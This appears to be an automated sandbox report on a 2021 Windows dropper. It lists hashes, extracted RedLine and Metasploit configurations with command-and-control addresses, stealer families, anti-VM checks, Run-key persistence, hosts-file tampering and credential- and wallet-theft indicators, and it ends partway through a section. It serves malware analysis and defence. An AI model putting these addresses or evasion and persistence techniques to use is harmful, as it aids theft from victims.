Analysis
-
max time kernel
219s -
max time network
1804s -
platform
windows11_x64 -
resource
win11 -
submitted
21-08-2021 07:42
Static task
static1
Behavioral task
behavioral1
Sample
C0672CA6E505B76756AC421EF9D33409.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
C0672CA6E505B76756AC421EF9D33409.bin.exe
Resource
win11
Behavioral task
behavioral3
Sample
C0672CA6E505B76756AC421EF9D33409.bin.exe
Resource
win10v20210408
General
-
Target
C0672CA6E505B76756AC421EF9D33409.bin.exe
-
Size
7.9MB
-
MD5
c0672ca6e505b76756ac421ef9d33409
-
SHA1
a773fe4c53105ae987d6c4cebaf3095102a6f103
-
SHA256
b01b61c911a3b80d4f265e4915f9d62275efa34f84989f77be142f3f9e062f9b
-
SHA512
b928cf61eb3dfc1503692a1db54ede52bd2c29b836198ded91d94e414e8bb3012ef3bb2b2e145358951252778403665ea8e9b5eef34fe22f329fc6a5947a0e55
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
redline
www
185.204.109.146:54891
Extracted
redline
Second_7.5K
45.14.49.200:27625
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3792-184-0x00000000052E0000-0x0000000005C06000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3788 4780 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6952 4484 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5556 4484 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6056 4484 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe family_redline C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe family_redline C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe family_redline C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe family_redline behavioral2/memory/2728-363-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/3424-391-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/3836-375-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeSetup.exeWerFault.exeWerFault.exeWerFault.exeMsiExec.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 2108 created 860 2108 WerFault.exe pub2.exe PID 4620 created 3792 4620 WerFault.exe Info.exe PID 4592 created 2288 4592 WerFault.exe rundll32.exe PID 4628 created 744 4628 WerFault.exe Install.exe PID 3840 created 3636 3840 WerFault.exe HigBkRPx0qyWn99cHptOkbti.exe PID 3616 created 3904 3616 WerFault.exe gq7BdFzcCpgT9R8qUlDBiVoJ.exe PID 1720 created 5080 1720 WerFault.exe AE4Cr0V8AbXUi2Vh3WIgJzcr.exe PID 2832 created 3896 2832 WerFault.exe ZH_D8d_woMBuwaliVLK7dXsO.exe PID 4112 created 4844 4112 Setup.exe n5iK85pyxBdO3WOr6bRNQ6xx.exe PID 976 created 1524 976 WerFault.exe LGCH2-401_2021-08-18_14-40.exe PID 1480 created 4612 1480 WerFault.exe TNGkwm8vY3ofA8gUTLfxgcxK.exe PID 2568 created 2384 2568 WerFault.exe askinstall53.exe PID 7040 created 6248 7040 MsiExec.exe bEQOSwZfLy35v67HMStZes1l.exe PID 6264 created 4640 6264 WerFault.exe WchvfjN_dzKFtUxFm7qRXxfF.exe PID 7096 created 3116 7096 WerFault.exe rundll32.exe PID 3124 created 6392 3124 WerFault.exe msedge.exe PID 6752 created 6236 6752 WerFault.exe msedge.exe PID 1856 created 3712 1856 WerFault.exe 6609898.exe PID 6684 created 6492 6684 WerFault.exe asMNUD7Whzsx89sAGP_aLokg.exe PID 6480 created 1212 6480 WerFault.exe rundll32.exe PID 6704 created 5880 6704 WerFault.exe 8324748.exe PID 700 created 5132 700 vdi_compiler.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3904-298-0x0000000004A30000-0x0000000004ACD000-memory.dmp family_vidar behavioral2/memory/1524-464-0x0000000004AE0000-0x0000000004B7D000-memory.dmp family_vidar -
Blocklisted process makes network request 5 IoCs
Processes:
MsiExec.exeflow pid process 281 4056 MsiExec.exe 286 4056 MsiExec.exe 290 4056 MsiExec.exe 293 4056 MsiExec.exe 295 4056 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
3377047_logo_media.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe -
Executes dropped EXE 64 IoCs
Processes:
KRSetp.exeFolder.exeInfo.exeFile.exepub2.exeInstall.exejamesold.exemd9_1sjm.exeFiles.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeAE4Cr0V8AbXUi2Vh3WIgJzcr.exefy9NfATq_QWOepz6ymSl2HMo.exegq7BdFzcCpgT9R8qUlDBiVoJ.exeTNGkwm8vY3ofA8gUTLfxgcxK.exetjy1GrraGlAjKtsTJ6fwTeqw.exeKlF1TC_kNM1irfli5mSNl_JB.exedcN39oeQcO1TI8LbRct_X8zm.exeHigBkRPx0qyWn99cHptOkbti.exeY7aLf8zJ97XcPikNEtC8S9tn.exekkDrRR_yCJmCdQFYoj6gRE_m.exe2u55W290oBvJVcrb8gcaR3aD.exe8hYCRVQG3M8blCFUnrCF4_z3.exeF8iDNg2j1mYQjJrSJjuQ9boD.exeJJPVa_sOJMzqe2j7ZHG84SEf.exe2D6KXJ4Sih2rnKqehqnnaTsh.exeZH_D8d_woMBuwaliVLK7dXsO.exeWNJCVPrW3aAcLvQSoBp1SYrf.exen5iK85pyxBdO3WOr6bRNQ6xx.exeYqIXiCL33maLAy2OB92ojfwd.exejooyu.exemd8_8eus.execustomer3.exeYqIXiCL33maLAy2OB92ojfwd.tmpmsedge.exeKlF1TC_kNM1irfli5mSNl_JB.exesvchost.exen5iK85pyxBdO3WOr6bRNQ6xx.exe8473479.exeEsplorarne.exe.com6609898.exe11111.exe8259576.exeLGCH2-401_2021-08-18_14-40.exeInlog.exeCleaner Installation.exeWEATHER Manager.exeInlog.tmpEsplorarne.exe.comVPN.exeConhost.exemd7_7dfj.exeVPN.tmpaskinstall53.exeMediaBurner2.exeMediaBurner2.tmp11111.exeWinHoster.exePBrowFile15.exe3377047_logo_media.exe11111.exezhaoy-game.exeMaskVPNUpdate.exepid process 3900 KRSetp.exe 3528 Folder.exe 3792 Info.exe 4464 File.exe 860 pub2.exe 744 Install.exe 1268 jamesold.exe 3124 md9_1sjm.exe 1888 Files.exe 3480 Folder.exe 1672 jfiag3g_gg.exe 3764 jfiag3g_gg.exe 5080 AE4Cr0V8AbXUi2Vh3WIgJzcr.exe 1252 fy9NfATq_QWOepz6ymSl2HMo.exe 3904 gq7BdFzcCpgT9R8qUlDBiVoJ.exe 4612 TNGkwm8vY3ofA8gUTLfxgcxK.exe 5116 tjy1GrraGlAjKtsTJ6fwTeqw.exe 1856 KlF1TC_kNM1irfli5mSNl_JB.exe 4308 dcN39oeQcO1TI8LbRct_X8zm.exe 3636 HigBkRPx0qyWn99cHptOkbti.exe 1480 Y7aLf8zJ97XcPikNEtC8S9tn.exe 1612 kkDrRR_yCJmCdQFYoj6gRE_m.exe 2988 2u55W290oBvJVcrb8gcaR3aD.exe 3068 8hYCRVQG3M8blCFUnrCF4_z3.exe 1004 F8iDNg2j1mYQjJrSJjuQ9boD.exe 1568 JJPVa_sOJMzqe2j7ZHG84SEf.exe 3712 2D6KXJ4Sih2rnKqehqnnaTsh.exe 3896 ZH_D8d_woMBuwaliVLK7dXsO.exe 1648 WNJCVPrW3aAcLvQSoBp1SYrf.exe 2712 n5iK85pyxBdO3WOr6bRNQ6xx.exe 3176 YqIXiCL33maLAy2OB92ojfwd.exe 732 jooyu.exe 3396 md8_8eus.exe 4200 customer3.exe 2792 YqIXiCL33maLAy2OB92ojfwd.tmp 3428 msedge.exe 2728 KlF1TC_kNM1irfli5mSNl_JB.exe 3836 svchost.exe 4844 n5iK85pyxBdO3WOr6bRNQ6xx.exe 804 8473479.exe 3424 Esplorarne.exe.com 3712 6609898.exe 1396 11111.exe 1436 8259576.exe 1524 LGCH2-401_2021-08-18_14-40.exe 2144 Inlog.exe 2508 Cleaner Installation.exe 1264 WEATHER Manager.exe 1244 Inlog.tmp 860 Esplorarne.exe.com 2380 VPN.exe 2332 Conhost.exe 4628 md7_7dfj.exe 2840 VPN.tmp 2384 askinstall53.exe 3948 MediaBurner2.exe 5388 MediaBurner2.tmp 5468 11111.exe 5564 WinHoster.exe 3740 PBrowFile15.exe 5320 3377047_logo_media.exe 4228 11111.exe 5356 zhaoy-game.exe 1684 MaskVPNUpdate.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
F8iDNg2j1mYQjJrSJjuQ9boD.exe0bM853sXZJfrnu2mWSAOETVc.exetjy1GrraGlAjKtsTJ6fwTeqw.exedcN39oeQcO1TI8LbRct_X8zm.exeWNJCVPrW3aAcLvQSoBp1SYrf.exe7vrT3uOZl1qmiSYlZrNbnZUH.exeNwFGfQ4gWNhniyDRsfbdyZxN.exe5uJnm0wkHdqW1g5_jI555vTL.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F8iDNg2j1mYQjJrSJjuQ9boD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0bM853sXZJfrnu2mWSAOETVc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tjy1GrraGlAjKtsTJ6fwTeqw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dcN39oeQcO1TI8LbRct_X8zm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WNJCVPrW3aAcLvQSoBp1SYrf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7vrT3uOZl1qmiSYlZrNbnZUH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7vrT3uOZl1qmiSYlZrNbnZUH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0bM853sXZJfrnu2mWSAOETVc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F8iDNg2j1mYQjJrSJjuQ9boD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WNJCVPrW3aAcLvQSoBp1SYrf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NwFGfQ4gWNhniyDRsfbdyZxN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5uJnm0wkHdqW1g5_jI555vTL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tjy1GrraGlAjKtsTJ6fwTeqw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dcN39oeQcO1TI8LbRct_X8zm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NwFGfQ4gWNhniyDRsfbdyZxN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5uJnm0wkHdqW1g5_jI555vTL.exe -
Loads dropped DLL 43 IoCs
Processes:
rundll32.exeYqIXiCL33maLAy2OB92ojfwd.tmpCleaner Installation.exeInlog.tmpConhost.exeVPN.tmpMediaBurner2.tmpSetup.exet32Ur7ILpInlYyJRLs12SnLx.tmprundll32.exeSetup.tmpMsiExec.exeSetup.tmpMsiExec.exerundll32.exeGameBoxWin64.exeMsiExec.exesvrwebui.exeMsiExec.exepid process 2288 rundll32.exe 2792 YqIXiCL33maLAy2OB92ojfwd.tmp 2792 YqIXiCL33maLAy2OB92ojfwd.tmp 2508 Cleaner Installation.exe 1244 Inlog.tmp 1244 Inlog.tmp 2332 Conhost.exe 2332 Conhost.exe 2840 VPN.tmp 2840 VPN.tmp 5388 MediaBurner2.tmp 132 Setup.exe 6892 t32Ur7ILpInlYyJRLs12SnLx.tmp 6892 t32Ur7ILpInlYyJRLs12SnLx.tmp 3116 rundll32.exe 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 7040 MsiExec.exe 5508 Setup.tmp 7040 MsiExec.exe 5216 MsiExec.exe 5216 MsiExec.exe 5216 MsiExec.exe 1212 rundll32.exe 3212 GameBoxWin64.exe 3212 GameBoxWin64.exe 4056 MsiExec.exe 3212 GameBoxWin64.exe 5276 svrwebui.exe 5276 svrwebui.exe 5276 svrwebui.exe 5276 svrwebui.exe 5276 svrwebui.exe 5276 svrwebui.exe 5372 MsiExec.exe 5372 MsiExec.exe 4056 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\F8iDNg2j1mYQjJrSJjuQ9boD.exe themida C:\Users\Admin\Documents\F8iDNg2j1mYQjJrSJjuQ9boD.exe themida C:\Users\Admin\Documents\tjy1GrraGlAjKtsTJ6fwTeqw.exe themida C:\Users\Admin\Documents\dcN39oeQcO1TI8LbRct_X8zm.exe themida C:\Users\Admin\Documents\WNJCVPrW3aAcLvQSoBp1SYrf.exe themida C:\Users\Admin\Documents\dcN39oeQcO1TI8LbRct_X8zm.exe themida C:\Users\Admin\Documents\tjy1GrraGlAjKtsTJ6fwTeqw.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Files.exe8259576.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8259576.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
WNJCVPrW3aAcLvQSoBp1SYrf.exe5uJnm0wkHdqW1g5_jI555vTL.exemd9_1sjm.exetjy1GrraGlAjKtsTJ6fwTeqw.exedcN39oeQcO1TI8LbRct_X8zm.exe7vrT3uOZl1qmiSYlZrNbnZUH.exeNwFGfQ4gWNhniyDRsfbdyZxN.exe0bM853sXZJfrnu2mWSAOETVc.exeF8iDNg2j1mYQjJrSJjuQ9boD.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WNJCVPrW3aAcLvQSoBp1SYrf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5uJnm0wkHdqW1g5_jI555vTL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tjy1GrraGlAjKtsTJ6fwTeqw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dcN39oeQcO1TI8LbRct_X8zm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7vrT3uOZl1qmiSYlZrNbnZUH.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NwFGfQ4gWNhniyDRsfbdyZxN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0bM853sXZJfrnu2mWSAOETVc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F8iDNg2j1mYQjJrSJjuQ9boD.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
GameBoxWin64.exeCleaner Installation.exemsiexec.exeSetup.exedescription ioc process File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\O: Setup.exe File opened (read-only) \??\V: Setup.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: GameBoxWin64.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\X: Setup.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\P: GameBoxWin64.exe File opened (read-only) \??\V: GameBoxWin64.exe File opened (read-only) \??\W: GameBoxWin64.exe File opened (read-only) \??\L: Setup.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: Setup.exe File opened (read-only) \??\T: Setup.exe File opened (read-only) \??\H: GameBoxWin64.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\W: Setup.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: Setup.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\N: GameBoxWin64.exe File opened (read-only) \??\R: GameBoxWin64.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 245 ipinfo.io 15 ip-api.com 47 ipinfo.io 139 ipinfo.io 141 ipinfo.io 166 ipinfo.io 180 ipinfo.io 15 ipinfo.io 107 ipinfo.io 136 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
F8iDNg2j1mYQjJrSJjuQ9boD.exetjy1GrraGlAjKtsTJ6fwTeqw.exedcN39oeQcO1TI8LbRct_X8zm.exeWNJCVPrW3aAcLvQSoBp1SYrf.exe7vrT3uOZl1qmiSYlZrNbnZUH.exeNwFGfQ4gWNhniyDRsfbdyZxN.exe5uJnm0wkHdqW1g5_jI555vTL.exe0bM853sXZJfrnu2mWSAOETVc.exepid process 1004 F8iDNg2j1mYQjJrSJjuQ9boD.exe 5116 tjy1GrraGlAjKtsTJ6fwTeqw.exe 4308 dcN39oeQcO1TI8LbRct_X8zm.exe 1648 WNJCVPrW3aAcLvQSoBp1SYrf.exe 6408 7vrT3uOZl1qmiSYlZrNbnZUH.exe 6400 NwFGfQ4gWNhniyDRsfbdyZxN.exe 6376 5uJnm0wkHdqW1g5_jI555vTL.exe 4592 0bM853sXZJfrnu2mWSAOETVc.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
WerFault.exekkDrRR_yCJmCdQFYoj6gRE_m.exeJJPVa_sOJMzqe2j7ZHG84SEf.execmd.exe9VfyAu5Y5h33aHpqD2aHew95.exeDeHSDgDwlyn6MuTw6HCcYCrn.exedescription pid process target process PID 1856 set thread context of 2728 1856 WerFault.exe KlF1TC_kNM1irfli5mSNl_JB.exe PID 1612 set thread context of 3836 1612 kkDrRR_yCJmCdQFYoj6gRE_m.exe svchost.exe PID 1568 set thread context of 3424 1568 JJPVa_sOJMzqe2j7ZHG84SEf.exe Esplorarne.exe.com PID 5064 set thread context of 5288 5064 cmd.exe rQWlsYju61VFwsMGUM6zDgsi.exe PID 5704 set thread context of 6336 5704 9VfyAu5Y5h33aHpqD2aHew95.exe 11111.exe PID 6476 set thread context of 1864 6476 DeHSDgDwlyn6MuTw6HCcYCrn.exe DeHSDgDwlyn6MuTw6HCcYCrn.exe -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jamesold.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\jamesold.exe autoit_exe -
Drops file in Program Files directory 64 IoCs
Processes:
Setup.tmp8473479.exe2D6KXJ4Sih2rnKqehqnnaTsh.exeSetup.tmpdescription ioc process File created C:\Program Files (x86)\MaskVPN\is-0DQIK.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe 8473479.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe 8473479.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-4M4I9.tmp Setup.tmp File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 2D6KXJ4Sih2rnKqehqnnaTsh.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe 8473479.exe File created C:\Program Files (x86)\MaskVPN\is-3BN1U.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-BMLQD.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-S6CB1.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-KMGQH.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe 8473479.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe 8473479.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-LKDVJ.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-3BO1N.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-24I6F.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-F7E2A.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-0C4HR.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-D7UKA.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-0CGQ1.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-M3Q8D.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3503V.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 2D6KXJ4Sih2rnKqehqnnaTsh.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe 8473479.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-3UUG2.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-ADLR4.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-N9P3G.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-5HJ6I.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-U0LMG.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe 8473479.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe 8473479.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe 8473479.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3IRMH.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-S9U67.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-KIBEN.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-OR833.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-TQOGM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-MPGCT.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe 2D6KXJ4Sih2rnKqehqnnaTsh.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe 2D6KXJ4Sih2rnKqehqnnaTsh.exe File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-DBMV3.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-R1BUK.tmp Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-A8N91.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-I2RUC.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-TDDSI.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe 8473479.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe 8473479.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe 8473479.exe -
Drops file in Windows directory 8 IoCs
Processes:
